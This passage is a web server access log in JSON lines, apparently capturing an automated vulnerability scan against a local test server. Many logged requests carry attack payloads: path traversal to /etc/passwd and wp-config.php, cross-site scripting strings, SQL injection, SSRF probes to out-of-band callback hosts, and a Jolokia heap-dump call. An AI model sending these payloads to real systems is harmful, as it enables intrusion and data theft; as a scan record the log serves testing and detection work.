HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.850","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.470","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.866","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?u=http://c9oms3gsmpve1ijt0mc0z8pnuhw4ttffc.oast.live/&href=http://c9oms3gsmpve1ijt0mc0od98yc6c5kwqi.oast.live/&action=http://c9oms3gsmpve1ijt0mc0augr3m4i8in6p.oast.live/&host=c9oms3gsmpve1ijt0mc0q1d54j6ht8gy5.oast.live&http_host=c9oms3gsmpve1ijt0mc08of55umxhcmwg.oast.live&email=root@c9oms3gsmpve1ijt0mc0nmzbzdjwr66uy.oast.live&url=http://c9oms3gsmpve1ijt0mc04b6deeaqnemcu.oast.live/&load=http://c9oms3gsmpve1ijt0mc0f9fy5ynac8jjx.oast.live/&preview=http://c9oms3gsmpve1ijt0mc0cn97znyexuasa.oast.live/&target=http://c9oms3gsmpve1ijt0mc06wqu8yh6h9t4h.oast.live/&proxy=http://c9oms3gsmpve1ijt0mc04qm5xj7wmd83f.oast.live/&from=http://c9oms3gsmpve1ijt0mc0wsuq57nfo79m8.oast.live/&src=http://c9oms3gsmpve1ijt0mc098padwy1nakwq.oast.live/&ref=http://c9oms3gsmpve1ijt0mc0zwgqowt1rusd8.oast.live/&referrer=http://c9oms3gsmpve1ijt0mc0oczptafxdbjr3.oast.live/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.407","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://c9oms3gsmpve1ijt0mc0nsksr75ydoos7.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.441","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.903","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.409","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.883","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.380","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.411","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:41 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.684","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.496","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/install.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.885","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet 